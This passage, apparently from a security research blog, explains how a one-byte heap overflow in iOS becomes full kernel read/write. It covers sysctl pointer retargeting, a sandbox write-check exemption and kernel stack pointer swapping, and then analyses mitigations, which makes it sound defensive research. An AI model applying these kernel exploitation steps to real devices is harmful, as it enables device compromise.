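To make the check concrete, here is a minimal sketch in C of how a range table like the one above can decide whether a physical address carries the 0x4000 bit. It is a toy model, not XNU's code: the struct layout, the names io_range, lookup_wimg and is_ppl_restricted, and the choice to return 0 for unlisted addresses are all assumptions made for illustration. Only the addresses, lengths and wimg values are taken from the devicetree dump.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified model of one "pmap-io-ranges" entry (not XNU's actual layout). */
struct io_range {
    uint64_t addr;
    uint64_t len;
    uint32_t wimg;
};

/* The bit tested by the decompiled pmap_enter_options_internal() excerpt. */
#define WIMG_RESTRICTED_BIT 0x4000u

/* A few rows copied from the devicetree dump. */
static const struct io_range io_ranges[] = {
    { 0x620000000ULL, 0x40000000ULL, 0x27 },   /* PCIe */
    { 0x2412C0000ULL, 0x4000ULL,     0x4007 }, /* dart-sep */
    { 0x235004000ULL, 0x4000ULL,     0x4007 }, /* dart-sio */
    { 0x24AC00000ULL, 0x4000ULL,     0x4007 }, /* dart-aop */
};

/* Return the wimg value of the range covering paddr.
 * Assumption: addresses outside every range yield 0 in this toy model. */
uint32_t lookup_wimg(uint64_t paddr)
{
    for (size_t i = 0; i < sizeof(io_ranges) / sizeof(io_ranges[0]); i++) {
        const struct io_range *r = &io_ranges[i];
        assert(r->len != 0);
        if (paddr >= r->addr && paddr - r->addr < r->len)
            return r->wimg;
    }
    return 0;
}

/* True if the address falls in a range whose wimg has bit 0x4000 set. */
bool is_ppl_restricted(uint64_t paddr)
{
    return (lookup_wimg(paddr) & WIMG_RESTRICTED_BIT) != 0;
}
```

In this model, is_ppl_restricted(0x2412C0000) is true for dart-sep, while the PCIe range and any address not listed in the table come back unrestricted.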
Thus, we cannot map the DART into userspace to disable it.

The palantír
Even though PPL prevents us from mapping page tables and DART I/O addresses, the physical I/O addresses for other hardware components are still mappable. Thus, it is still possible to map and read some system component's hardware registers to try and locate the kernel.
My initial attempt was to read from IORVBAR, the Reset Vector Base Address Register accessible via MMIO. The reset vector is the first piece of code that executes on a CPU after it resets; thus, reading IORVBAR would give us the physical address of XNU's reset vector, which would pinpoint the kernelcache in physical memory.
IORVBAR is mapped at offset 0x40000 after the "reg-private" address for each CPU in the devicetree; for example, on A13 CPU 0 it is located at physical address 0x210050000. It is part of the same group of register sets containing CoreSight and DBGWRAP that had been previously used to bypass KTRR. However, I found that IORVBAR is not accessible on A13: trying to read from it will panic.
I spent some time searching the A13 SecureROM for interesting physical addresses before Jann Horn suggested that I map the KTRR lockdown registers on the AMCC, Apple's memory controller. These registers store the physical memory bounds of the KTRR region in order to enforce the KTRR readonly region against attacks from coprocessors.

Mapping and reading the AMCC's RORGNBASEADDR register at physical address 0x200000680 worked like a charm, yielding the start address of the lockdown region containing the kernelcache in physical memory. Using security mitigations to break other security mitigations is fun. :)

The back gate is closed
After finding a definitive way forward using AMCC, I looked at one last possibility before giving up on bypassing PPL.
iOS is configured with 40-bit physical addresses and 16K pages (14 bits). Meanwhile, the arbitrary physical page number passed to pmap_enter_options_internal() is 32 bits, and is shifted by 14 and masked with 0xFFFF_FFFF_C000 when inserted into the level 3 translation table entry (L3 TTE). This means that we could control bits 45 - 14 of the TTE, even though bits 45 - 40 should always be zero based on the physical address size programmed in TCR_EL1.IPS.
If the hardware ignored the bits beyond the maximum supported physical address size, then we could bypass PPL by supplying a physical page number that exactly matches the DART I/O address or page table page, but with one of the high bits set. Having the high bits set would cause the mapped address to fail to match any of the addresses in "pmap-io-ranges", even though the TTE would map the same physical address. This would be neat as it would allow us to bypass PPL as a precursor to kernel read/write/execute, rather than the other way around.
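The arithmetic behind this idea can be sketched in a few lines of C. This is only an illustration of the bit manipulation described above: the function and macro names are hypothetical, and the DART address is the dart-sep entry from the devicetree dump. The shift of 14, the 0xFFFF_FFFF_C000 mask and the 40-bit physical address size come from the text.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT_16K 14
#define TTE_OA_MASK    0xFFFFFFFFC000ULL     /* bits 47..14 of the TTE */
#define PA_BITS        40                    /* physical address size */
#define PA_MASK        ((1ULL << PA_BITS) - 1)

/* Output-address bits that a 32-bit physical page number contributes to an L3 TTE. */
uint64_t tte_output_address(uint32_t ppnum)
{
    return ((uint64_t)ppnum << PAGE_SHIFT_16K) & TTE_OA_MASK;
}

/* Page number for paddr with one extra address bit (40..45) set on top. */
uint32_t alias_ppnum(uint64_t paddr, unsigned high_bit)
{
    assert(high_bit >= PA_BITS && high_bit <= 45);
    return (uint32_t)(paddr >> PAGE_SHIFT_16K) | (1u << (high_bit - PAGE_SHIFT_16K));
}
```

For the dart-sep address 0x2412C0000 with bit 40 set, alias_ppnum() gives page number 0x40904B0 and the TTE would hold 0x102412C0000. That value lies outside every "pmap-io-ranges" entry, yet masking it with PA_MASK gives back 0x2412C0000, which is why the trick would have worked had the hardware ignored the high bits.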
Unfortunately, it turns out that the hardware does in fact check that TTE bits beyond the supported physical address size are zero. Thus, I went forward with the AMCC trick to locate the kernelcache instead.

The taming of sysctl
At this point, we have a physical read/write primitive for non-PPL physical addresses, and we know the address of the kernelcache in physical memory. The next step is to build a virtual read/write primitive.
I decided to stick with known techniques for this part: using the fact that the sysctl_oid tree used by the sysctl() syscall is stored in writable memory in the kernelcache to manipulate it and convert benign sysctls allowed by the app sandbox into kernel read/write primitives.
XNU inherited sysctls from FreeBSD; they provide access to certain kernel variables to userspace. For example, the "hw.l1dcachesize" readonly sysctl allows a process to determine the L1 data cache size, while the "kern.securelevel" read/write sysctl controls the "system security level" used for some operations in the BSD portion of the kernel.
The sysctls are organized into a tree hierarchy, with each node in the tree represented by a sysctl_oid struct. Building a kernel read primitive is as simple as mapping the sysctl_oid struct for some sysctl that is readable in the app sandbox and changing the target variable pointer (oid_arg1) to point to the virtual address we want to read. Invoking the sysctl then reads that address.
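The effect of retargeting oid_arg1 can be illustrated with a toy model in ordinary userspace C. Nothing here is XNU code: toy_sysctl_oid keeps only the oid_arg1 field named in the text, the oid_size field and both functions are hypothetical, and the "kernel" variables are plain locals in the caller.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Toy stand-in for a sysctl node; only oid_arg1 corresponds to the text. */
struct toy_sysctl_oid {
    void  *oid_arg1;  /* pointer to the variable the sysctl exposes */
    size_t oid_size;  /* hypothetical: size of that variable */
};

/* Toy read handler: copy out whatever oid_arg1 currently points to. */
size_t toy_sysctl_read(const struct toy_sysctl_oid *oid, void *out, size_t outlen)
{
    assert(oid != NULL && out != NULL);
    size_t n = oid->oid_size < outlen ? oid->oid_size : outlen;
    memcpy(out, oid->oid_arg1, n);
    return n;
}

/* The exploit step in miniature: point the node at an address of our choosing. */
void toy_retarget(struct toy_sysctl_oid *oid, void *target)
{
    oid->oid_arg1 = target;
}
```

A caller that sets up a node over a benign int, reads it, calls toy_retarget() with the address of another variable and reads again will get the second variable's contents through the same unchanged handler. That is the whole trick: the handler is never touched, only the data pointer.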

Using sysctls to build a write primitive is a bit more complicated, since no sysctls are listed as writable in the container sandbox profile. The ziVA exploit for iOS 10.3.1 worked around this by changing the oid_handler field of the sysctl to call copyin(). However, on PAC-enabled devices like the A13, oid_handler is protected with a PAC, meaning that we cannot change its value.
However, when disassembling the function hook_system_check_sysctlbyname() that implements the sandbox check for the sysctl() system call, I noticed an interesting undocumented behavior:
// Sandbox check sysctl-read
ret = sb_evaluate(sandbox, 116u, &context);
if ( !ret )
{
    // Sandbox check sysctl-write
    if ( newlen | newptr && (namelen != 2 || name[0] != 0 || name[1] != 3) )
        ret = sb_evaluate(sandbox, 117u, &context);
    else
        ret = 0;
}
For some reason, if the sysctl node is deemed readable inside the sandbox, then the write check is not performed on the specific sysctl node { 0, 3 }! What this means is that { 0, 3 } will be writable in every sandbox from which it is readable, regardless of whether or not the sandbox profile allows writes to that sysctl.
As it turns out, the name of the sysctl { 0, 3 } is "sysctl.name2mib", which is a writable sysctl used to convert the string-name of a sysctl into the numeric form, which is faster to look up. It is used to implement sysctlnametomib(). So it makes sense that this sysctl should usually be writable.
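The decision logic in that decompiled check can be restated as a small standalone C function. This is a simplified model under stated assumptions: toy_profile and toy_check_sysctl are hypothetical names, the profile is reduced to two booleans, and the is_write flag stands in for the "newlen | newptr" test. Only the { 0, 3 } exemption itself comes from the disassembly.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical sandbox profile reduced to the two relevant operations. */
struct toy_profile {
    bool allow_sysctl_read;
    bool allow_sysctl_write;
};

/* Returns 0 if the access is allowed and nonzero if it is denied. */
int toy_check_sysctl(const struct toy_profile *p, const int *name,
                     size_t namelen, bool is_write)
{
    assert(p != NULL && (name != NULL || namelen == 0));
    if (!p->allow_sysctl_read)
        return 1;                              /* sysctl-read denied */
    bool is_name2mib = (namelen == 2 && name[0] == 0 && name[1] == 3);
    if (is_write && !is_name2mib)
        return p->allow_sysctl_write ? 0 : 1;  /* sysctl-write is evaluated */
    return 0;                                  /* write check is skipped */
}
```

With a profile that allows reads but not writes, a write to { 0, 3 } returns 0 while a write to any other node returns 1, matching the behavior described above.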
The upshot is that even though there are no writable sysctls specified in the sandbox profile, sysctl { 0, 3 } is in fact writable anyways, allowing us to build a virtual write primitive alongside our read primitive. Thus, we now have full arbitrary kernel read/write.

III - The Return of the Copyout

The battle of pmap fields
We have come far, but the journey is not yet done: we must break the ring. As things stand, vm_map_copyout_internal() is spinning in an infinite loop on the "done" vm_map_entry, whose vme_next pointer points to itself. We must guide the safe return of this function to preserve the stability of the system.

There are two basic issues preventing this. First, because we've inserted entries into our page tables at the pmap layer without creating corresponding virtual entries at the vm_map layer, there is currently an accounting conflict between the pmap and vm_map views of our address space. This will cause a panic on process exit if not addressed. Second, once the loop is broken, vm_map_copyout_internal() has a call to vm_map_copy_insert() that will panic trying to free the corrupted vm_map_copy to the wrong zone.
We will address the pmap/vm_map conflict first.
Suppose for the moment that we were able to break out of the for loop and allow vm_map_copyout_internal() to return. The call to vm_map_copy_insert() that occurs after the for loop walks through all the entries in the vm_map_copy, unlinks them from the vm_map_copy's entry list, and links them into the vm_map's entry list instead.
static void
vm_map_copy_insert(
    vm_map_t        map,
    vm_map_entry_t  after_where,
    vm_map_copy_t   copy)
{
    vm_map_entry_t  entry;

    while (vm_map_copy_first_entry(copy) !=
               vm_map_copy_to_entry(copy)) {
        entry = vm_map_copy_first_entry(copy);
        vm_map_copy_entry_unlink(copy, entry);
        vm_map_store_entry_link(map, after_where, entry,
            VM_MAP_KERNEL_FLAGS_NONE);
        after_where = entry;
    }
    zfree(vm_map_copy_zone, copy);
}
Since the vm_map_copy's vm_map_entrys are all fake objects residing in shared memory, we really do not want them linked into our vm_map's entry list, where they will be freed on process exit. The simplest solution is thus to update the corrupted vm_map_copy's entry list so that it appears to be empty.
Forcing the vm_map_copy's entry list to appear empty certainly lets us safely return from vm_map_copyout_internal(), but we would nevertheless still get a panic once our process exits:
panic(cpu 3 caller 0xfffffff01f4b1c50): "pmap_tte_deallocate(): pmap=0xfffffff06cd8fd10 ttep=0xfffffff0a90d0408 ptd=0xfffffff132fc3ca0 refcnt=0x2 \n"
The issue is that during the course of the exploit, our mapping primitive forces pmap_enter_options() to insert level 3 translation table entries (L3 TTEs) into our process's page tables, but the corresponding accounting at the vm_map layer never happens. This disagreement between the pmap and vm_map views matters because the pmap layer requires that all physical mappings be explicitly removed before the pmap can be destroyed, and the vm_map layer will not know to remove a physical mapping if there is no vm_map_entry describing the corresponding virtual mapping.
Due to PPL, we cannot update the pmap directly, so the simplest solution is to grab a pointer to a legitimate vm_map_entry with faulted-in pages and overlay it on top of the virtual address range at which pmap_enter_options() established our physical mappings. Thus we will update the corrupted vm_map_copy's entry list so that it points to this single "overlay" entry instead.

The fires of stack doom
Finally, it is time to break vm_map_copyout_internal() out of the for loop.
    for (entry = vm_map_copy_first_entry(copy);        entry != vm_map_copy_to_entry(copy);        entry = entry->vme_next) {
The macro vm_map_copy_to_entry(copy) expands to:
    (struct vm_map_entry *)(&copy->c_u.hdr.links)
Thus, in order to break out of the loop, we need to process a vm_map_entry with vme_next pointing to the address of the c_u.hdr.links field in the corrupted vm_map_copy originally passed to this function.
The function is currently spinning on the "done" vm_map_entry, and we need to link in one final "overlay" vm_map_entry to address the pmap/vm_map accounting issue anyway. So the simplest way to break the loop is to modify the "overlay" entry's vme_next to point to &copy->c_u.hdr.links, and then update the "done" entry's vme_next to point to the overlay entry.
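The relinking step can be modeled with a toy circular list in plain C. The types below are hypothetical stand-ins that borrow the field names from the text but not XNU's layout, and toy_walk() adds a step limit so that the "spinning" state can be observed without actually hanging.

```c
#include <assert.h>
#include <stddef.h>

/* Toy list links; names follow the text, layout is not XNU's. */
struct toy_entry {
    struct toy_entry *vme_prev;
    struct toy_entry *vme_next;
};

struct toy_copy {
    struct toy_entry links;  /* list header, doubling as the end-of-list sentinel */
};

/* Analogue of the vm_map_copy_to_entry(copy) macro. */
struct toy_entry *toy_copy_to_entry(struct toy_copy *copy)
{
    return &copy->links;
}

/* Walk from start as the for loop does. Returns the number of entries visited,
 * or -1 if the sentinel is not reached within limit steps (still spinning). */
int toy_walk(struct toy_copy *copy, struct toy_entry *start, int limit)
{
    assert(limit > 0);
    int steps = 0;
    for (struct toy_entry *e = start; e != toy_copy_to_entry(copy); e = e->vme_next) {
        if (++steps > limit)
            return -1;
    }
    return steps;
}

/* Terminate the overlay entry first, then publish it through "done". */
void toy_break_loop(struct toy_copy *copy, struct toy_entry *done,
                    struct toy_entry *overlay)
{
    overlay->vme_next = toy_copy_to_entry(copy);
    done->vme_next = overlay;
}
```

Before toy_break_loop() a walk starting at a self-linked "done" entry never reaches the sentinel; afterwards it visits "done" and "overlay" and stops. The order of the two stores mirrors the text: the overlay entry is made to end the list before the spinning thread can reach it. A real implementation writing from another thread would also have to care about memory ordering, which this single-threaded sketch ignores.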

The problem is the call to vm_map_copy_insert() mentioned earlier, which frees the vm_map_copy as if it were of type ENTRY_LIST:
    zfree(vm_map_copy_zone, copy);
However, the object passed to zfree() is our corrupted vm_map_copy, which was allocated with kalloc(); trying to free it to the vm_map_copy_zone will panic. Thus, we somehow need to ensure that a different, legitimate vm_map_copy object gets passed to the zfree() instead.
Fortunately, if you check the disassembly of vm_map_copyout_internal(), the vm_map_copy pointer is spilled to the stack for the duration of the for loop!
FFFFFFF007C599A4     STR     X28, [SP,#0xF0+copy]
FFFFFFF007C599A8     LDR     X25, [X28,]
FFFFFFF007C599AC     CMP     X25, X27
FFFFFFF007C599B0     B.EQ    loc_FFFFFFF007C59B98
...                             ; The for loop
FFFFFFF007C59B98     LDP     X9, X19, [SP,#0xF0+dst_addr]
FFFFFFF007C59B9C     LDR     X8, [X19,#vm_map_copy.offset]
This makes it easy to ensure that the pointer passed to zfree() is a legitimate vm_map_copy allocated from the vm_map_copy_zone: just scan the kernel stack of the vm_map_copyout_internal() thread while it's still spinning and swap any pointers to the corrupted vm_map_copy with the legitimate one.
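The scan-and-swap itself is a simple loop. The sketch below runs over an ordinary array of 64-bit words; in the exploit the same operation would go through the kernel read/write primitives against the spinning thread's kernel stack. The function name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Replace every 64-bit word equal to old_ptr with new_ptr.
 * Returns the number of words that were replaced. */
size_t swap_stack_pointers(uint64_t *stack, size_t nwords,
                           uint64_t old_ptr, uint64_t new_ptr)
{
    assert(stack != NULL || nwords == 0);
    size_t swapped = 0;
    for (size_t i = 0; i < nwords; i++) {
        if (stack[i] == old_ptr) {
            stack[i] = new_ptr;
            swapped++;
        }
    }
    return swapped;
}
```

Matching on the exact pointer value keeps the scan from disturbing unrelated stack contents, and the return value gives a quick sanity check that at least one spilled copy was found.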

At last, we have fixed up the state enough to allow vm_map_copyout_internal() to break the loop and return safely.

Homeward bound
Finally, with a virtual kernel read/write primitive and the vm_map_copyout_internal() thread safely returned, we have achieved our goal: a stable kernel compromise achieved by turning a one-byte controlled heap overflow directly into an arbitrary physical address mapping primitive.
Or rather, a nearly-arbitrary physical address mapping primitive. As we have seen, PPL-protected addresses like page table pages and DARTs cannot be mapped using this technique.
When I started on this journey, I had intended to demonstrate that the conventional approach of going after the kernel task port was both unnecessary and limiting, that other kernel read/write techniques could be equally powerful. I suspected that the introduction of Mach-port based techniques in iOS 10 had biased the sample of publicly-disclosed exploits in favor of Mach-port oriented vulnerabilities, and that this in turn obscured other techniques that were just as promising but publicly less well understood.
The one-byte technique initially seemed to offer a counterpoint to the mainstream exploit flow. After reading the code in vm_map.c and pmap.c, I had expected to be able to simply map all of DRAM into my address space and then implement kernel read/write by performing manual page table walks using those mappings. But it turned out that PPL blocks this technique on modern iOS by preventing certain pages from being mapped at all.
It's interesting to note that similar research was touched upon years ago as well, back when such a thing would have worked. While doing background research for this blog post, I came across a presentation by Azimuth called iOS 6 Kernel Security: A Hacker’s Guide that introduced no fewer than four separate primitives that could be constructed by corrupting various fields of vm_map_copy_t: an adjacent memory disclosure, an arbitrary memory disclosure, an extended heap overflow, and a combined address disclosure and heap overflow at the disclosed address.

At the time of the presentation, the KERNEL_BUFFER type had a slightly different structure, so that overlapped a field storing the vm_map_copy's kalloc() allocation size. It might have still been possible to turn a one-byte overflow into a physical memory mapping primitive on some platforms, but it would have been harder since it would require mapping the NULL page and a shared address space. However, a larger overflow like those used in the four aforementioned techniques could certainly change both the type and the fields.
After its apparent public introduction in that Azimuth presentation by Mark Dowd and Tarjei Mandt, vm_map_copy corruption was repeatedly cited as a widely used exploit technique. See for example: From USR to SVC: Dissecting the 'evasi0n' Kernel Exploit by Tarjei Mandt; Tales from iOS 6 Exploitation by Stefan Esser; Attacking the XNU Kernel in El Capitan by Luca Todesco; Shooting the OS X El Capitan Kernel Like a Sniper by Liang Chen and Qidan He; iOS 10 - Kernel Heap Revisited by Stefan Esser; iOS kernel exploitation archaeology by Patroklos Argyroudis; and *OS Internals, Volume III: Security and Insecurity by Jonathan Levin, in particular Chapter 18 on TaiG. Given the prevalence of these other forms of vm_map_copy corruption, it would not surprise me to learn that someone had discovered the physical mapping primitive as well.
Then, in OS X 10.11 and iOS 9, the vm_map_copy struct was modified to remove the redundant allocation size and inline data pointer fields in KERNEL_BUFFER instances. It is possible that this was done to mitigate the frequent abuse of this structure in exploits, although it's hard to tell because those fields were redundant and could have been removed simply to clean up the code. Regardless, removing those fields changed vm_map_copy into its current form, weakening the precondition required to carry out this technique to a single byte overflow.

The mitigating of the Shire
So, how effective were the various iOS kernel exploit mitigations at blocking the one-byte technique, and how effective could they be if further hardened?
The mitigations I considered were KASLR, PAN, PAC, PPL, and zone_require. Many other mitigations exist, but either they don't apply to the heap overflow bug class or they aren't sensible candidates to mitigate this particular technique.
First, kernel address space layout randomization, or KASLR. KASLR can be divided into two parts: the sliding of the kernelcache image in virtual memory and the randomization of the kernel_map and submaps (zone_map, kalloc_map, etc.), collectively referred to as the "kernel heap". The kernel heap randomization means that you do need some way to determine the address of the kernel/user shared memory buffer in which we build the fake VM objects. However, once you have the address of the shared buffer, neither form of randomization has much bearing on this technique, for two reasons: First, generic iOS kernel heap shaping primitives exist that can be used to reliably place almost any allocation in the target kalloc zones before a vm_map_copy allocation, so randomization does not block the initial memory corruption. Second, after the corruption occurs, the primitive granted is arbitrary physical read/write, which is independent of virtual address randomization.
The only address randomization which does impact the core exploit technique is that of the kernelcache load address in physical memory. When iOS boots, iBoot loads the kernelcache into physical DRAM at a random address. As discussed in Part I, this physical randomization is quite small at 32 MB. However, improved randomization would not help because the AMCC hardware registers can be mapped to locate the kernelcache in physical memory regardless of where it is located.
Next consider PAN, or Privileged Access Never. This is an ARMv8.1 security mitigation that prevents the kernel from directly accessing userspace virtual memory, thereby preventing the common technique of overwriting pointers to kernel objects so that they point to fake objects living in userspace. Bypassing PAN is a prerequisite for this technique: we need to establish a complex hierarchy of vm_map_entry, vm_object, and vm_page objects at a known address. While hardcoding the shared buffer address is good enough for this POC, better techniques would be needed for a real exploit.
PAC, or Pointer Authentication Codes, is an ARMv8.3 security feature introduced in Apple's A12 SOC. The iOS kernel uses PAC for two purposes: first as an exploit mitigation against certain common bug classes and techniques, and second as a form of kernel control flow integrity to prevent an attacker with kernel read/write from gaining arbitrary code execution. In this setting, we're only interested in PAC as an exploit mitigation.
Apple's website has a table showing how various types of pointers are protected by PAC. Most of these pointers are automatically PAC-protected by the compiler, and the biggest impact of PAC so far is on C++ objects, especially in IOKit. Meanwhile, the one-byte exploit technique only involves vm_map_copy, vm_map_entry, vm_object, and vm_page objects, all plain C structs in the Mach part of the kernel, and so is unaffected by PAC.
However, at BlackHat 2019, Ivan Krstić of Apple announced that PAC would soon be used to protect certain "members of high value data structures", including "processes, tasks, codesigning, the virtual memory subsystem, [and] IPC structures". As of May 2020, this enhanced PAC protection has not yet been released, but if implemented it might prove effective at blocking the one-byte technique.
The next mitigation is PPL, which stands for Page Protection Layer. PPL creates a security boundary between the code that manages page tables and the rest of the XNU kernel. This is the only mitigation besides PAN that impacted the development of this exploit technique.
In practice, PPL could be much stricter about which physical addresses it allows to be mapped into a userspace process. For example, there is no legitimate use case for a userspace process to have access to kernelcache pages, so setting a flag like PVH_FLAG_LOCKDOWN on kernelcache pages could be a weak but sensible step. More generally, addresses outside the Application Processor's DRAM region (including physical I/O addresses for hardware components) could probably be made unmappable for most processes, perhaps with an entitlement escape hatch for exceptional cases.
Finally, the last mitigation is zone_require, a software mitigation introduced in iOS 13 that checks that some kernel pointers are allocated from the expected zalloc zone before using them. I don't believe that XNU's zone allocator was initially intended as a security mitigation, but the fact remains that many objects that are frequently targeted during exploits (in particular ipc_ports, tasks, and threads) are allocated from a dedicated zone. This makes zone checks an effective funnel point for detecting exploitation shenanigans.
In theory, zone_require could be used to protect almost any object allocated from a dedicated zone; in practice, though, the vast majority of zone_require() checks in the kernelcache are on ipc_port objects. Because the one-byte technique avoids the use of fake Mach ports altogether, none of the existing zone_require() checks apply.
However, if the use of zone_require were expanded, it would be possible to partially mitigate the technique. In particular, inserting a zone_require() call in vm_map_copyout_internal() once the vm_map_copy has been determined to be of type ENTRY_LIST would ensure that the vm_map_copy cannot be a KERNEL_BUFFER object with a corrupted type. Of course, like all mitigations, this isn't 100% robust: using the technique in an exploit would probably still be possible, but it might require a better initial primitive than a one-byte overflow.

"Appendix A": Annals of the exploits
In my opinion, the one-byte exploit technique outlined in this blog post is a divergence from the conventional strategies employed at least since iOS 10. Fully 19 of the 24 original public exploits that I could find since iOS 10 used dangling or fake Mach ports as an intermediate exploitation primitive. And of the 20 exploits released since iOS 10.3 (when Apple initially started locking down the kernel task port), 18 of those ended by constructing a fake kernel task port. This makes Mach ports the defining feature of modern public iOS kernel exploitation.
Having gone through the motions of using the one-byte technique to build a kernel read/write primitive on top of a simulated heap overflow, I certainly can see the logic of going after the kernel task port instead. Most of the exploits I looked at since iOS 10 have a relatively modular design and a linear flow: an initial primitive is obtained, state is manipulated, an exploitation technique is applied to build a stronger primitive, state is manipulated again, another technique is applied after that, and so on, until finally you have enough to build a fake kernel task port. There are checkpoints along the way: initial corruption, dangling Mach port, 4-byte read primitive, etc. The exact sequence of steps in each case is different, but in broad strokes the designs of different exploits converge. And because of this convergence, the last steps of one exploit are pretty much interchangeable with those of any other. The design of it all "feels clean".
That modularity is not true of this one-byte technique. Once you start the vm_map_copyout_internal() loop, you are committed to this course until after you've obtained a kernel read/write primitive. And because vm_map_copyout_internal() holds the vm_map lock for the duration of the loop, you can't perform any of the virtual memory operations (like allocating virtual memory) that would normally be integral steps in a conventional exploit flow. Writing this exploit thus feels different, more messy.
All that said, and at the risk of sounding like I'm tooting my own horn, the one-byte technique intuitively feels to me somewhat more "technically elegant": it turns a weaker precondition directly into a very strong primitive while sidestepping most mitigations and avoiding most sources of instability and slowness seen in public iOS exploits. Of the 24 iOS exploits I looked at, 22 depend on reallocating a slot for an object that has been recently freed with another object, many doing so multiple times; with the notable exception of SockPuppet, this is an inherently risky operation because another thread could race to reallocate that slot instead. Furthermore, 11 of the 19 exploits since iOS 11 depend on forcing a zone garbage collection, an even riskier step that often takes a few seconds to complete.
Meanwhile, the one-byte technique has no inherent sources of instability or substantial time costs. It looks more like the type of technique I would expect sophisticated attackers would be interested in developing. And even if something goes wrong during the exploit and a bad address is dereferenced in the kernel, the fact that the vm_map lock is held means that the fault results in a deadlock rather than a kernel panic, making the failed exploit look like a frozen process instead of a system crash. (You can even "kill" the deadlocked app in the app switcher UI and then continue using the device afterwards.)

"Appendix B": Conclusions
I'll conclude by returning to the three questions posed at the very beginning of this post:
Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?
These questions are all too "fuzzy" to have real answers, but I'll attempt to answer them anyway.
To the first question, I think the answer is no, the kernel task port is not the singular best exploit flow. In my opinion the one-byte technique is just as good by most measures, and I expect there are other as-yet unpublished techniques that are equally good.
To the second question, on whether the convergence on the kernel task port has obscured other techniques: I don't think there is enough public iOS research to say conclusively, but my intuition is yes. In my own experience, knowing the type of bug I'm looking for has influenced the types of bugs I find, and looking at past exploits has guided my choice in exploit flow. I would not be surprised to learn others feel similarly.
Finally, are existing iOS kernel exploit mitigations effective against unseen exploit flows? Immediately after I developed the POC for the one-byte technique, I had thought the answer was no; but here at the end of this journey, I'm less certain. I don't think PPL was specifically designed to prevent this technique, but it offers a very reasonable place to mitigate it. PAC didn't do anything to block the technique, but it's plausible that a future expansion of PAC-protected pointers would. And despite the fact that zone_require didn't impact the exploit at all, a single-line addition would strengthen the required precondition from a single-byte overflow to a larger overflow that crosses a zone boundary. So, even though in their current form Apple's kernel exploit mitigations were not effective against this unseen technique, they do lay the necessary groundwork to make mitigating the technique straightforward.

Indices
One final parting thought. In Deja-XNU, published 2018, Ian Beer mused about what the "state-of-the-art" of iOS kernel exploitation might have looked like four years prior:
An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.
This is an important question to consider because, as defenders, we almost never get to see the capabilities of the most sophisticated attackers. If a gap develops between the techniques used by attackers in private and the techniques known to defenders, then defenders may waste resources mitigating against the wrong techniques.
I don't think this technique represents the current state-of-the-art; I'd guess that, like Deja-XNU, it might represent the state-of-the-art of a few years ago. It's worth considering what direction the state-of-the-art may have taken in the meantime.
Category: Hacking & Security

Root Cause Analyses for 0-day In-the-Wild Exploits

29 July, 2020 - 19:27
Posted by Maddie Stone, Project Zero
When a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day. 
Our effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we’re publishing some in bulk now to play “catch-up”, in the future we plan to post each one in a timely manner after it’s detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and actions. 
We’ve added a new column to the “0day In the Wild” tracking spreadsheet that will link to any RCAs that we publish. We will also continue to update the following page on our blog as we publish additional RCAs.
0-Day Exploit Root Cause Analyses
For each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we’d love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our template and publish this information about 0-days they detect and/or analyze! 
When completing a root cause analysis we focus on the following areas.
  • Bug class
  • Details of the vulnerability, such as how to trigger, what it allows, etc.
  • Exploit method and whether or not it’s a known method
  • Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)
  • Any historical, present, and future bug context such as previous related bugs
  • Areas for variant analysis and any found variants
  • Structural improvements
    • Can you also kill the entire bug class?
    • Is there a way to make it much harder to exploit?
  • Potential detection methods for similar 0-days
    • Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from “indicators of compromise” because we’re focusing on detecting while it’s still a 0-day.

We selected these areas because the vulnerability details and exploit method provide in-depth explanation of facts of the exploit: what is the vulnerability, how does it work, and how was it exploited. Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or not work well in practice, some will be (and already have been) reasonable and able to be launched. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lockdown, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.
Out of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we’re publishing here today. These cover 5 of the 6 0-days detected in August 2019 or later (when I joined the team and started this initiative). In addition, we’re publishing analyses of the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with Google's Threat Analysis Group, and of a Firefox 0-day that Project Zero had reported to Firefox and that was also discovered independently in the wild.

These RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers. 
Our hope is that these analyses help others in the security and tech communities act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time consuming, and more difficult for attackers to use 0-days in the wild. Please reach out with any feedback and/or suggestions; we hope that others will also begin publishing information from the RCA template in the future.
Category: Hacking & Security

Detection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019

29 July, 2020 - 19:27
Posted by Maddie Stone, Project Zero
